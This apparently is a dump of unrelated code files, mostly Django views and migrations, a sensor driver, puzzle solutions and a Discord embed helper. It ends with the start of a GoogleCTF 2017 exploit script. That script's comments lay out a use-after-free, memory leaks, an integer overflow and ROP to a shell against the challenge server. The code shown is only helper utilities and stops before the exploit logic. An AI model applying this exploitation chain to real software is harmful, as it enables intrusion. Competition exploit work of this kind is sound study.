        days=(date.today()-lb.issuedate)
        print(date.today())  # NOTE(review): leftover debug print
        d=days.days
        fine=0
        if d>20:
            day=d-20
            fine=day*10
        books=list(models.Book.objects.filter(isbn=lb.isbn))
        students=list(models.StudentExtra.objects.filter(enrollment=lb.enrollment))
        i=0
        # NOTE(review): iterates books but indexes BOTH lists with i,
        # assuming they have equal length; mismatched lengths would raise
        # IndexError. Verify isbn/enrollment are effectively unique.
        for l in books:
            t=(students[i].get_name,students[i].enrollment,books[i].name,books[i].author,issdate,expdate,fine)
            i=i+1
            li.append(t)
    return render(request,'library/view_issued_book.html',{'li':li})
@login_required(login_url='adminlogin')
@user_passes_test(is_admin)
def viewstudent_view(request):
students=models.StudentExtra.objects.all()
return render(request,'library/view_student.html',{'students':students})
@login_required(login_url='studentlogin')
def viewissuedbookbystudent(request):
student=models.StudentExtra.objects.filter(user_id=request.user.id)
issuedbook=models.IssuedBook.objects.filter(enrollment=student[0].enrollment)
li1=[]
li2=[]
for ib in issuedbook:
books=models.Book.objects.filter(isbn=ib.isbn)
for book in books:
t=(request.user,student[0],book.name,book.author)
li1.append(t)
issdate=str(ib.issuedate.day)+'-'+str(ib.issuedate.month)+'-'+str(ib.issuedate.year)
expdate=str(ib.expirydate.day)+'-'+str(ib.expirydate.month)+'-'+str(ib.expirydate.year)
#fine calculation
days=(date.today()-ib.issuedate)
print(date.today())
d=days.days
fine=0
if d>20:
day=d-20
fine=day*10
t=(issdate,expdate,fine)
li2.append(t)
return render(request,'library/view_issued_book_bystudent.html',{'li1':li1,'li2':li2})
def aboutus_view(request):
return render(request,'library/about_us.html')
def contactus_view(request):
sub = forms.ContactusForm()
if request.method == 'POST':
sub = forms.ContactusForm(request.POST)
if sub.is_valid():
email = sub.cleaned_data['Email']
name=sub.cleaned_data['Name']
message = sub.cleaned_data['Message']
send_mail(str(name)+' || '+str(email),message, EMAIL_HOST_USER, ['mayankgourav2@gmail.com'], fail_silently = False)
return render(request, 'library/contact_us_success.html')
return render(request, 'library/contact_us.html', {'form':sub})
@login_required(login_url='studentlogin')
def viewbook_view(request):
books=models.Book.objects.all()
return render(request,'library/view_book.html',{'books':books})
def blog_view(request):
return render(request,'library/blogs.html') |
7,643 | c6d9b971ab6919846807b740313d450d086ecc23 | import VL53L1X
from sensor_msgs.msg import Range
class _VL53L1():
def __init__(self, address=0x29):
address = int(address, 16)
print("initialising sensor with address: {}".format(hex(address)))
try:
self.tof = VL53L1X.VL53L1X(i2c_bus=1, i2c_address=address)
self.tof.open()
self.tof.start_ranging(0)
self.tof.set_timing(30000, 33)
except Exception as e:
print(e)
def set_range(self, rng):
if rng < 4 and rng >= 0:
self.tof.set_range()
else:
raise Exception("Invalid range: 1 - short, 2 - med, 3 - long")
def set_fov(self, mode):
if mode == "wide":
roi = VL53L1X.VL53L1xUserRoi(0, 15, 15, 0)
elif mode == "center":
roi = VL53L1X.VL53L1xUserRoi(6, 9, 9, 6)
elif mode == "top":
roi = VL53L1X.VL53L1xUserRoi(6, 15, 9, 12)
elif mode == "bottom":
roi = VL53L1X.VL53L1xUserRoi(6, 3, 9, 0)
elif mode == "left":
roi = VL53L1X.VL53L1xUserRoi(0, 9, 3, 6)
elif mode == "right":
roi = VL53L1X.VL53L1xUserRoi(12, 9, 15, 6)
else:
roi = VL53L1X.VL53L1xUserRoi(0, 15, 15, 0)
self.tof.set_user_roi(roi)
def read(self):
dist = self.tof.get_distance()
msg = Range()
msg.radiation_type = 1
msg.field_of_view = 27
msg.min_range = 0
msg.max_range = 400
msg.range = float(dist)
return msg |
7,644 | 6aa762165dba891a3638d13862019dd342a7e05a | # Generated by Django 3.0.1 on 2020-01-11 19:59
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('users', '0004_auto_20191230_2037'),
]
operations = [
migrations.AddField(
model_name='user',
name='circles',
field=models.CharField(choices=[('NUX', 'NUXPIA'), ('NET', 'NET'), ('DOT', 'DOT-GABI'), ('IMA', 'IMAGINE'), ('PNN', 'P&N'), ('MEG', 'MEGA-BRAIN')], max_length=18, null=True, verbose_name='동아리'),
),
migrations.AddField(
model_name='user',
name='department',
field=models.CharField(choices=[('OTHERS', '학부생이 아님'), ('CS', '컴퓨터공학부'), ('DRON', '드론IOT시뮬레이션학부'), ('MED', '의과대학'), ('LIB', '문리과대학'), ('SOC', '사회과학대학'), ('ENG', '공과대학'), ('HEL', '보건의료융합대학'), ('BNIT', 'BNIT융합대학'), ('PHA', '약학대학')], max_length=24, null=True, verbose_name='학과'),
),
migrations.AlterField(
model_name='user',
name='level',
field=models.CharField(choices=[('3', 'Lv3_미인증사용자'), ('2', 'Lv2_인증사용자'), ('1', 'Lv1_관리자'), ('0', 'Lv0_개발자')], default=3, max_length=18, verbose_name='등급'),
),
]
|
7,645 | c22651437094723b711a959e031f1c7f928f735a | data = [
"........#.............#........",
"...#....#...#....#.............",
".#..#...#............#.....#..#",
"..#......#..##............###..",
"..........#......#..#..#.......",
".#..#.......#.........#.#......",
".........#..#....##..#.##....#.",
"..#....##...#..................",
"##..........#.##...#....##..#..",
"...#....#...#..............#...",
"...........................#..#",
"..##.##.#..................#...",
"...#.##..#............#........",
"........#.......#...#.....##.#.",
".##..........#......#.......#..",
"...#..........#...#..#.......#.",
"......#...#...#.##.......#.#...",
"........#...#...#...##.........",
"#..............#.#....#.......#",
"..#..#..#.#....#...............",
".....#........#...#..........#.",
"##......#...#..#.##.......#....",
"..#.#.....#.#.............#.#.#",
"#..#..##......##...#...........",
"..#......#........#.....#......",
".....#.......#....#.#...#......",
"...#........#...........#...#..",
".......#.#...........###....#..",
"...#...........##....##........",
"#....#..####....#.....#..#....#",
"..........#...........#........",
"...#.......#....#.#.........#..",
"....#...#.......#..###.........",
"......#......#..#......#..#....",
"...#.....#............#..#.....",
"...#.#.#.#..#.......#.....#....",
"#....##...#.........#...##.....",
"#..#.......#..#..#..#...##.....",
"#.......#............#.....#...",
".#........##....##...#........#",
".....#...#.....................",
".......#........#..............",
".....#............#.#.#...#.#..",
".....##..#.............#.......",
"..#.##..#........#..#...#......",
".........#.#....#...........#..",
".#.....#..#....#.....#...#.....",
"....#.#................#.......",
"...............##......#...#...",
".##...#...#.......##.#....#....",
"............#........#.......#.",
"......##.#.#...................",
".#.#..............#.......#....",
"#.....#...#.......#..#...#.....",
".............#....#..#......#..",
"........#...##................#",
".......#...#..#..##............",
"..#..#...##...#..#.#.....#...#.",
".#.#...#.........#.#...........",
"...###....#.......#...#........",
"........#......##.#...#..##..#.",
".....................#.#.......",
".............#...........#...#.",
"#..#..#.....#.#...#............",
"...#....#.....#...........#....",
"..##.....##...#......#..##.....",
"#.....#.....###.#.....#....##..",
".#...........###...............",
"..................#..##.#...#..",
"................#....##.#......",
".#.#.#...#....#.........#..#.#.",
"#.......#........##............",
".......##.#....#.#............#",
"..........#..##.#....#.........",
"........##..#....#.............",
".........#....#...........##...",
"#.........#.#..#..#..........#.",
".....#........#......#.........",
"....#.#.#...............#......",
".#..#..##...#.##..........#....",
"..#....................#.#.....",
".........#....#...........#.#.#",
"........#....##.##.............",
"..#.....#.......#..#......#....",
"#..........#.#.....#.#....#....",
"........##.#.....#..#.....#.#..",
"...................#...#....#.#",
"............#..#....#...#...#..",
"..............#.#.........#....",
"...#..#..#.#..##..##...........",
".#...........................#.",
".#.......#...........#....#.#.#",
"......#..#...#........#...##...",
".........#......#.#.......#...#",
"...#..##................#......",
".............#.#..##....#.#....",
"...............#..#......#.....",
".#......#.#.#....#........#....",
"........#..#.##..#..#.........#",
"...#....#.#...#..#.......#..#..",
"..#...##.........#..#...#......",
"...#...........#.............#.",
"....#.....................#....",
".....#..#...............#.#...#",
"....#..........#........#......",
"..#....#........##..##.........",
"...#....#..#.#.......#...#.....",
"..#........#....#...##....#.#..",
".#...#........##.....#....###..",
"#....#....##......#........#...",
".........#..#.#..........#....#",
"....#...#.....#.......##.......",
"..............#..........#.##..",
"#...#..#..............#......#.",
".................#......##....#",
"..#..##..#.......#..#.#......#.",
".............#........#.....#.#",
".#.##............#..#..........",
"..#...#...........#..##........",
".#....#...#....#.......#.......",
"...#.#..#..#..#....#.....#..#..",
"....#..##..............#...#...",
"#..........###......###........",
".##.##......#..#............#..",
".#...........#.#.....#...#.....",
"#.#..#...#............#........",
".........#...#...#..........##.",
".......###..#..........#.......",
"...........###.....#........#..",
".#.............#.....#......#..",
"...#.....#....#.#.........##...",
"....##..##...#.......##........",
"......#....##.........#......#.",
"..........#.....##..#.....#..#.",
"..........####...#..#.........#",
".##....#..#.#...#.......#......",
"...#.#.##.#.#...#....#.#.#.....",
".........#...##........##.....#",
"..#........#..........##...##.#",
"##...##..........#.#...........",
"..............#......#.........",
"........#.....#.#.......#......",
".#...#.....#....#.#..#.........",
".....#....................##...",
"....#..................#.#...##",
".....#............#..##........",
"#..........#....#.#.......##.#.",
"....#..#.....................#.",
"#..#....##.....#...............",
"..#...#..#..##....#.#..........",
".......#......#.#.......#.....#",
"...#.#.......#...#.##..........",
"....#..........#....#.#.#......",
".......#..#..........#..##.....",
"#......#......#...#......#...#.",
"###..#....##......##........#..",
".#..........#.....#.......#.#..",
".......#.....#.....#.#.........",
"..#...#....#...................",
"..............#.##.............",
".#...#.......#.##...#.#.......#",
".......#......................#",
"....#.#...#.#........#.........",
".#......#....#...#.............",
"#.......#...###.....#.#.#..#...",
"#....##.#...............##.....",
"..#.......#..................#.",
".....####...............#......",
".##......#......#.#.......##.#.",
"#......##..###....#....#......#",
".##.......##.##...#.##.........",
"......##............#.......#..",
"......#..#.....##.#............",
".#..........#.....##...........",
"#.........#......#......##.#...",
".........#.......#..#......#.#.",
".........#.......#...........#.",
".#..##.#..................##...",
".............#.............#...",
".....##........#......##...##..",
"..#..#.#.....#..#....#.........",
".....#....#.....#.....#........",
"#......##.....#....#....#......",
"#.................#..#.#......#",
".......#..#......#....#.#...#.#",
"....#.........#..#..........#.#",
"##......#............#...#...#.",
"....##......#...#.....#....##..",
".#...##.........#..............",
"......#.....................#..",
"..#..........###....#..........",
"#....#...#..#.............#....",
"#........#.#......#....#.......",
".#...#.......#..#...#.#...#..#.",
"................##.#.....#.....",
"###.......#...#................",
"...#.......#...#.#.....#.......",
"..#.........#.....#.#.......#..",
"......#.......................#",
"#.....#.#..#....#.......#......",
"...#....#..#....####...........",
".............#.....#...##......",
".......#.........#...#..#......",
".##..#.........#....#.#........",
"....##...#.#...........#....#..",
".........................##....",
"..###.......##....#.#.........#",
".#....#.#.#...........##....#..",
"......#...#..#..#..#..#.......#",
"..#....#.#.......#..#..#..#...#",
".....##...#.##....#.#...#......",
".........#..#....#..#..........",
".##..##.........#.#.....#......",
"..........#...##...#.#...#.....",
"#.##..#..#.............#.......",
"...#...........#.......#......#",
".......#....#....#...##.......#",
"..#.##........###..#......#....",
"...#...........###......#..#..#",
".#.........#.#.........#.#.....",
"##.......##.##.##......##......",
"............#...#..........#...",
"....................#..........",
"...#..#...........#...#...#....",
".................#...#......###",
"...#................#.#.##.....",
"...............#........#......",
"#.............##......#.#..#...",
"..#.#.....#..#.##.....##...#...",
"......#.........#......#.......",
"#.......#......#....#........#.",
".#..##.....#.........#.........",
"....##.##.#...#.........##.#...",
"...............#..#..#..##.....",
".#..#...............###........",
".##............##..............",
"...............#...##...#...#.#",
"..#.#......#.#..#.............#",
"#.#..#..##.........#.#.#...#...",
"....##.#....................##.",
".........#..#.....#.....#..#..#",
"....#......#......#.##....#....",
"........###..#.............#..#",
"##................#.........#..",
"#.....#.......#....#...........",
"..#.......#..#........#....#...",
"..#.#.##..#.#...##........#.##.",
"..#..........#............#....",
"..........#...............##...",
"..........###........#.#.......",
".....###..#.............#......",
"##.............#...#.....#.....",
".....#......#....#........#.#..",
"............#..#..............#",
".................#...........##",
"#........#.........###.....#...",
"..#.#..............##......#.#.",
".#...........#.........#..##..#",
"...............................",
".#.....#..#....#....#......#...",
".#...#......#.#..#....#.......#",
"......#.##.......#......#......",
"......#..###..#................",
"#..#.....#........##...#.......",
"......##.........##....#...##..",
".#..........#.................#",
"#..#.......#...............#...",
".........#..###....#.#.##.#....",
"..#...#.##..##...............##",
".........#.....................",
".#....##...#......#....#.......",
"............#..........#..#....",
"...#......##....#....#........#",
".#...................#.........",
"#.#........###....#..........#.",
".........#....#....#........##.",
".#....#..#.........#..#........",
"...............#..#...#..#...##",
".........#....##....#......#...",
".#.............................",
"...#........#...#.#...#.#..#...",
".....#..##...#.#...............",
"#.....#....#.........#.........",
"#...#...........##.........#...",
"..##........#.#...#...#......#.",
"...........#.....#...#.#.......",
"......###....#.....#...........",
"......##...#..........#....#.#.",
".......##..##..........#.......",
"....#............#..#....##....",
"..##...................#.#.....",
"...#.#..#.#....................",
".#..##..#............##.###..#.",
"#.#...#....#.#..........#.#....",
"........#....#.....#...........",
"..##....#...#.......#..........",
"...........##.##....#..........",
".....#............#............",
".......#.............#....#....",
".................#......#......",
"......##.......#....#..##...#..",
".#..#....#.....................",
"...#.#.#...#......##...........",
"##........##.#....#....#.......",
".......#.....#..#..#...#.##....",
"#..........#....#.#..#..#..#...",
"...##..............#...........",
".........#.....#.#....#.......#",
".........#....##..#..##..#.....",
".....#......................#..",
"...###...#..#......#...........",
"....#.....................#....",
"...............................",
"..#.....###.......#..#....#....",
"#..........#.................#.",
"......#.......###.......#..##..",
".............#.##..............",
"......#..#.#..#...........#....",
"...#....##.#...#..#.#...#....#.",
"..................#...#....#.##",
"......#.#....#.................",
"......#.#.....#.....#..##......",
"#..##...........#..#.....#.##..",
]
def treeCounter(moveRight, moveDown, grid=None):
    """Count trees ('#') hit while descending *grid* with the given slope.

    Starting at the top-left cell, repeatedly step moveRight columns right
    (wrapping, since the pattern repeats horizontally) and moveDown rows
    down, counting '#' cells, until the bottom is passed.

    Args:
        moveRight: columns to step right per move.
        moveDown: rows to step down per move (must be > 0).
        grid: list of strings; defaults to the module-level puzzle input
            `data` (backward compatible with the original 2-arg calls).

    Returns:
        The number of trees hit. The count is also printed, preserving
        the original script's output.
    """
    if grid is None:
        grid = data
    trees = 0
    col = 0
    for row in range(moveDown, len(grid), moveDown):
        col = (col + moveRight) % len(grid[row])
        if grid[row][col] == '#':
            trees += 1
    print(trees)
    return trees
treeCounter(1,1)
treeCounter(3,1)
treeCounter(5,1)
treeCounter(7,1)
treeCounter(1,2) |
7,646 | 94a0b341aac3683712578b31e98a0a5a6a643b57 | # Pass Function
def hello_func():
pass
hello_func()
print(hello_func())
def hello_func():
hello_func()
print(hello_func)
# Function allows to reuse ,without repeat
def hello_func():
print('hello function!')
hello_func()
|
7,647 | 9a02e09cbfe2c9b6ebb9d20ba6cea639871f0838 | import datetime
import discord
def getTeams(reign, uprising, hunters, fuel, mayhem, gladiators, charge, outlaws, spark,
    spitfire, excelsior, eternal, fusion, dynasty, shock, dragons, defiant, valiant, titans,
    justice) :
    """Build a Discord embed listing every 2021 Overwatch League team.

    Each parameter is the per-team prefix string (e.g. a record or emoji)
    inserted before that team's line in the embed description.

    Returns:
        discord.Embed: gold embed, one line per team, UTC timestamped.
    """
    teamList = discord.Embed(
        title="Overwatch League Teams",
        description="2021 Season\n"+
        "**"+reign+"ATL-Atlanta Reign**\n"+
        "**"+uprising+"BOS-Boston Uprising**\n"+
        "**"+hunters+"CDH-Chengdu Hunters**\n"+
        "**"+fuel+"DAL-Dallas Fuel**\n"+
        "**"+mayhem+"FLA-Florida Mayhem**\n"+
        "**"+gladiators+"GLA-Los Angeles Gladiators**\n"+
        "**"+charge+"GZC-Guangzhou Charge**\n"+
        "**"+outlaws+"HOU-Houston Outlaws**\n"+
        "**"+spark+"HZS-Hangzhou Spark**\n"+
        "**"+spitfire+"LDN-London Spitfire**\n"+
        "**"+excelsior+"NYE-New York Excelsior**\n"+
        "**"+eternal+"PAR-Paris Eternal**\n"+
        # Fixed user-facing typo: "Fustion" -> "Fusion".
        "**"+fusion+"PHI-Philadelphia Fusion**\n"+
        "**"+dynasty+"SEO-Seoul Dynasty**\n"+
        "**"+shock+"SFS-San Francisco Shock**\n"+
        "**"+dragons+"SHD-Shanghai Dragons**\n"+
        # Added the explicit '+' that was missing here (the original relied
        # on implicit adjacent-literal concatenation across the line break).
        "**"+defiant+"TOR-Toronto Defiant**\n"+
        "**"+valiant+"VAL-Los Angeles Valiant**\n"+
        "**"+titans+"VAN-Vancouver Titans**\n"+
        "**"+justice+"WAS-Washington Justice**",
        color=discord.Colour.gold(),
        timestamp=datetime.datetime.utcnow()
    )
    return teamList
|
7,648 | 547935a67fb079e551534126534234ceb96ed0dd | # Generated by Django 2.0.13 on 2019-05-23 14:12
from django.db import migrations, models
class Migration(migrations.Migration):
    """Recreate User.projects as a ManyToManyField to projects.Project.

    Django cannot alter an existing field into a many-to-many in place,
    hence the remove-then-add pair.
    """

    dependencies = [
        ('projects', '0001_initial'),
        ('users', '0003_user_projects'),
    ]

    operations = [
        migrations.RemoveField(
            model_name='user',
            name='projects',
        ),
        migrations.AddField(
            model_name='user',
            name='projects',
            # NOTE(review): related_name='projects' means the reverse
            # accessor Project.projects yields *users* -- confusing naming;
            # verify before relying on it elsewhere.
            field=models.ManyToManyField(related_name='projects', to='projects.Project'),
        ),
    ]
|
7,649 | dbd04f7b88fa43ae920a6744e3979dbf917d3fc6 | import requests
import toml
from pathlib import Path
imgs:list
config:dict
def parseTex(lines:list):
    """Turn raw TeX lines into URL-ready fragments for codecogs.

    Args:
        lines: iterable of raw text lines (typically from tex.txt).

    Returns:
        List of (encoded_tex, inline) tuples; inline is True when the line
        was wrapped in single '$' delimiters (those are stripped).
    """
    new_lines = []
    for line in lines:
        if line == "\n":
            continue
        # A single leading '$' (but not '$$') marks inline math.
        # startswith avoids the IndexError the old line[1] check hit on
        # one-character lines.
        inline = line.startswith("$") and not line.startswith("$$")
        if inline:
            line = line.replace("$", "")
        line = line.replace("\n", "")
        line = line.replace(" ", "&space;")
        # Bug fix: this was line.replace("+", "+"), a no-op (most likely a
        # mangled encoding fix). '+' means a space in URL queries, so it
        # must be percent-encoded as %2B.
        line = line.replace("+", "%2B")
        new_lines.append((line, inline))
    return new_lines
def addColor(lines:list, color:str):
    """Wrap each parsed TeX fragment in a codecogs RGB color directive.

    Args:
        lines: list of (tex, inline) tuples as produced by parseTex().
        color: RGB triple as a string, e.g. "255, 0, 0".

    Returns:
        List of colored TeX strings; inline fragments get the \\inline prefix.
    """
    colortag = "{\color[RGB]{" + color + "}"
    colored = []
    for tex, inline in lines:
        wrapped = colortag + tex + "}"
        if inline:
            wrapped = """\inline""" + wrapped
        colored.append(wrapped)
    return colored
if Path("config.toml").exists():
with open("config.toml", "r") as loadconfig:
config = toml.load(loadconfig)
if config == {}:
config = {"colors": ["0, 0, 0"], "outputs": [""]}
else:
config = {"colors": ["0, 0, 0"], "outputs": [""]}
with open("tex.txt", "r") as tex:
imgs = tex.readlines()
imgs = parseTex(imgs) #returns a list of tuples, [0] is the parsed text, [1] is an inline boolean
for i, color in enumerate(config["colors"]):
coloredimgs = addColor(imgs, color)
output = "output" / Path(config["outputs"][i])
if (not output.exists()):
output.mkdir()
for j, tex in enumerate(coloredimgs):
link = "https://latex.codecogs.com/svg.latex?" + tex
print(link)
r = requests.get(link)
with open(output / ("latex" + str(j) + ".svg"), "wb") as svg:
svg.write(r.content)
|
7,650 | a1ea0f269a20ff608d10ee01804eeee7e7232b1d | # -*- coding: utf-8 -*-
## https://atcoder.jp/contests/abs/tasks/abc083_b
import sys
def gets(input):
    """Read a single line from *input* and strip surrounding whitespace."""
    line = input.readline()
    return line.strip()
def run(input):
    """Solve ABC083B: sum of 1..N whose decimal digit sum lies in [A, B].

    Reads one line "N A B" from *input* and returns the total.
    """
    # gets() helper inlined: read and strip the single input line.
    n, a, b = input.readline().strip().split()
    N, A, B = int(n), int(a), int(b)
    total = 0
    for i in range(1, N + 1):
        digit_sum = sum(int(ch) for ch in str(i))
        if A <= digit_sum <= B:
            total += i
    return total
def main():
    # Entry point: read the problem input from stdin and print the answer.
    result = run(sys.stdin)
    print(result)
main()
|
7,651 | e4a05cbfd0959402eacf21959c68e449d15b1e74 | #!/usr/bin/env python3
#
# Exploit for "assignment" of GoogleCTF 2017
#
# CTF-quality exploit...
#
# Slightly simplified and shortened explanation:
#
# The bug is a UAF of one or both values during add_assign() if a GC is
# triggered during allocate_value(). The exploit first abuses this to leak a
# pointer into the heap by confusing an Integer Value with a Property. It then
# abuses the UAF differently to create a fake String instance which is
# concatenated and returned. By faking a String in the heap, we can read
# arbitrary memory. We leak the addresses of libc and the stack. Next the
# exploit does some heap feng shui, then fakes a string with length 0xffffffXX,
# which triggers an integer overflow during string_concat(). This gives us a
# heap-based buffer overflow. With that we first corrupt a Property to point
# into the stack, then overwrite the length of the fake string with 0 to stop
# the memcpy. We leak the address of the binary from the return address. Next
# we write a value to the fake property. This writes a pointer to the heap into
# the stack. With that we corrupt only the first byte of the input buffer
# pointer so it now points further down into the stack. The next call to
# readline() by the application then writes into the stack frame of readline()
# and ultimately overwrites the return address => we get ROP:
#
# [+] Heap base @ 0x55cd3d465000
# [+] libc @ 0x7f7ea1f79000
# [+] stack @ 0x7ffcf044f448
# [+] /bin/sh @ 0x7f7ea20f9103
# [+] input_buf @ 0x7ffcf044f120
# [+] return address @ 0x7ffcf044f118
# [+] binary @ 0x55cd3c696000
# [+] offset to return address: 0x18
# [+] property name: j
# id
# uid=1337(user) gid=1337(user) groups=1337(user)
# ls
# assignment
# flag.txt
# cat flag.txt
# CTF{d0nT_tHrOw_0u7_th1nG5_yoU_5ti11_u53}
#
# Author: Samuel <saelo> Groß
#
import socket
import termios
import tty
import time
import sys
import select
import os
import re
import telnetlib
import string
from struct import pack, unpack
from binascii import hexlify, unhexlify
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Global Config
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#TARGET = ('localhost', 4444)
TARGET = ('assignment.ctfcompetition.com', 1337)
# Enable "wireshark" mode, pretty prints all incoming and outgoing network traffic.
NETDEBUG = False
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Encoding and Packing
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def e(d):
    """Encode the given string instance using UTF-8."""
    return bytes(d, 'UTF-8')
def d(d):
    """Decode the given bytes instance using UTF-8."""
    return str(d, 'UTF-8')
def p32(d):
    """Return d packed as 32-bit unsigned integer (little endian)."""
    # '<L' is identical to '<I' in standard (non-native) size mode.
    return pack('<L', d)
def u32(d):
    """Return the number represented by d when interpreted as a 32-bit unsigned integer (little endian)."""
    (value,) = unpack('<L', d)
    return value
def p64(d):
    """Return d packed as 64-bit unsigned integer (little endian)."""
    packed = pack('<Q', d)
    return packed
def u64(d):
    """Return the number represented by d when interpreted as a 64-bit unsigned integer (little endian)."""
    (value,) = unpack('<Q', d)
    return value
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Output
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def print_good(msg):
print(ansi(Term.BOLD) + '[+] ' + msg + ansi(Term.CLEAR))
def print_bad(msg):
print(ansi(Term.COLOR_MAGENTA) + '[-] ' + msg + ansi(Term.CLEAR))
def print_info(msg):
print('[*] ' + msg)
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Misc.
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def bytes_and_strings_are_cool(func):
    """Decorator that UTF-8-encodes every str argument before calling *func*.

    Positional and keyword arguments that are str instances are passed
    through e(); everything else is forwarded unchanged.
    """
    def inner(*args, **kwargs):
        nargs = tuple(e(arg) if isinstance(arg, str) else arg for arg in args)
        # Bug fix: this was dict(map(lambda k, v: ..., kwargs)), which
        # iterates only the keys and feeds them to a two-argument lambda --
        # a TypeError for any non-empty kwargs. Encode the values with a
        # dict comprehension instead.
        nkwargs = {k: e(v) if isinstance(v, str) else v for k, v in kwargs.items()}
        return func(*nargs, **nkwargs)
    return inner
def validate(data, badchars):
    """Assert that no badchar occurs in data."""
    for bad in badchars:
        assert bad not in data
def is_printable(b):
    """Return true if the given byte is a printable ASCII character."""
    # Sibling helper e() inlined so this stands alone: membership of an
    # int byte value in the encoded printable alphabet.
    return b in string.printable.encode('UTF-8')
def hexdump(data):
"""Return a hexdump of the given data. Similar to what `hexdump -C` produces."""
def is_hexdump_printable(b):
return b in b' 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz`~!@#$%^&*()-_=+[]{}\\|\'";:/?.,<>'
lines = []
chunks = (data[i*16:i*16+16] for i in range((len(data) + 15) // 16))
for i, chunk in enumerate(chunks):
hexblock = ['{:02x}'.format(b) for b in chunk]
left, right = ' '.join(hexblock[:8]), ' '.join(hexblock[8:])
asciiblock = ''.join(chr(b) if is_hexdump_printable(b) else '.' for b in chunk)
lines.append('{:08x} {:23} {:23} |{}|'.format(i*16, left, right, asciiblock))
return '\n'.join(lines)
class Term:
COLOR_BLACK = '30'
COLOR_RED = '31'
COLOR_GREEN = '32'
COLOR_BROWN = '33'
COLOR_BLUE = '34'
COLOR_MAGENTA = '35'
COLOR_CYAN = '36'
COLOR_WHITE = '37'
CLEAR = '0'
UNDERLINE = '4'
BOLD = '1'
ESCAPE_START = '\033['
ESCAPE_END = 'm'
# TODO rename to style and append Term.Clear ?
def ansi(*args):
    """Construct an ANSI terminal escape code from the given attribute strings."""
    joined_attrs = ';'.join(args)
    return Term.ESCAPE_START + joined_attrs + Term.ESCAPE_END
class DisconnectException(Exception):
pass
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Pattern Generation
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
class Pattern:
    """De-Bruijn sequence generator."""
    # Symbols used to build the sequence; 62 characters total.
    alphabet = string.digits + string.ascii_letters

    def __init__(self, length):
        # Pick the smallest subsequence length n such that alphabet**n covers
        # the requested length, then truncate the generated sequence.
        if length <= len(self.alphabet):
            self._seq = self.alphabet[:length]
        elif length <= len(self.alphabet) ** 2:
            self._seq = self._generate(2)[:length]
        elif length <= len(self.alphabet) ** 3:
            self._seq = self._generate(3)[:length]
        elif length <= len(self.alphabet) ** 4:
            self._seq = self._generate(4)[:length]
        else:
            raise Exception("Pattern length is way to large")

    def _generate(self, n):
        """Generate a De Bruijn sequence for subsequences of length n."""
        # See https://en.wikipedia.org/wiki/De_Bruijn_sequence
        k = len(self.alphabet)
        a = [0] * k * n
        sequence = []

        # Standard recursive FKM algorithm; appends Lyndon words whose
        # length divides n.
        def db(t, p):
            if t > n:
                if n % p == 0:
                    sequence.extend(a[1:p + 1])
            else:
                a[t] = a[t - p]
                db(t + 1, p)
                for j in range(a[t - p] + 1, k):
                    a[t] = j
                    db(t + 1, t)
        db(1, 1)
        return ''.join(self.alphabet[i] for i in sequence)

    def bytes(self):
        """Return this sequence as bytes."""
        return e(self._seq)

    def __str__(self):
        """Return this sequence as string."""
        return self._seq

    @bytes_and_strings_are_cool
    def offset(self, needle):
        """Returns the index of 'needle' in this sequence.

        'needle' should be of type string or bytes. If an integer is provided
        it will be treated as 32-bit or 64-bit little endian number, depending
        on its bit length.
        """
        if isinstance(needle, int):
            if needle.bit_length() <= 32:
                needle = p32(needle)
            else:
                needle = p64(needle)
        # The sequence is stored as str, so decode the needle before searching.
        needle = d(needle)
        idx = self._seq.index(needle)
        # An ambiguous needle would make the computed offset unreliable.
        if self._seq[idx+len(needle):].find(needle) != -1:
            raise ValueError("Multiple occurances found!")
        return idx
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Network
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
class Channel:
    """Convenience wrapper around a socket."""
    # Colors used by _prettyprint to mark traffic direction.
    OUTGOING_COLOR = Term.COLOR_RED
    INCOMING_COLOR = Term.COLOR_BLUE

    def __init__(self, sock, verbose):
        # sock: a connected socket; verbose: echo all traffic via _prettyprint.
        self._s = sock
        self._verbose = verbose
        self._buf = bytearray()  # internal receive buffer

    def _prettyprint(self, data, outgoing):
        """Prettyprint the given data.
        This does the following: All data that is valid ASCII is colorized according to the direction of the traffic.
        Everything else is converted to hex, then printed in bold and underline for visibility.
        Only ASCII is supported as of now. This might be the better choice anyway since otherwise valid UTF-8 might be
        detected in arbitrary binary streams.
        """
        TEXT = 0
        BINARY = 1
        # Various Thresholds for the heuristics below
        X = 4
        Y = 16
        Z = 2
        color = self.OUTGOING_COLOR if outgoing else self.INCOMING_COLOR
        # Step 1: Tag every byte of the input stream with it's detected type.
        parts = []
        curr = ''
        for b in data:
            if is_printable(b):
                parts.append((TEXT, b))
            else:
                parts.append((BINARY, b))
        # Step 2: Merge neighboring bytes of the same type and convert the sequences to type bytes.
        i = 0
        mergedparts = []
        while i < len(parts):
            t = parts[i][0]
            arr = [parts[i][1]]
            j = i+1
            while j < len(parts) and parts[j][0] == t:
                arr.append(parts[j][1])
                j += 1
            i = j
            # Heuristic: If there are Y ASCII bytes with the same value followed by Z ASCII bytes followed by binary data, treat the Z bytes as binary as well.
            extra = []
            if t == TEXT and len(arr) > Y and i < len(parts) - 1:
                mid = len(arr) - Z - 1
                start, end = mid, mid
                char = arr[mid]
                while start >= 0 and arr[start] == char:
                    start -= 1
                while end < len(arr) and arr[end] == char:
                    end += 1
                # start and end point outside the range of equal-valued characters now.
                if end - start >= Y+2 and end < len(parts):
                    extra = arr[end:]
                    arr = arr[:end]
            mergedparts.append((t, bytes(arr)))
            if extra:
                mergedparts.append((BINARY, bytes(extra)))
        parts = mergedparts
        # Step 3: Merge all parts and prepend the ansi terminal escape sequences for the given type.
        buf = ''
        last = None
        for tag, value in parts:
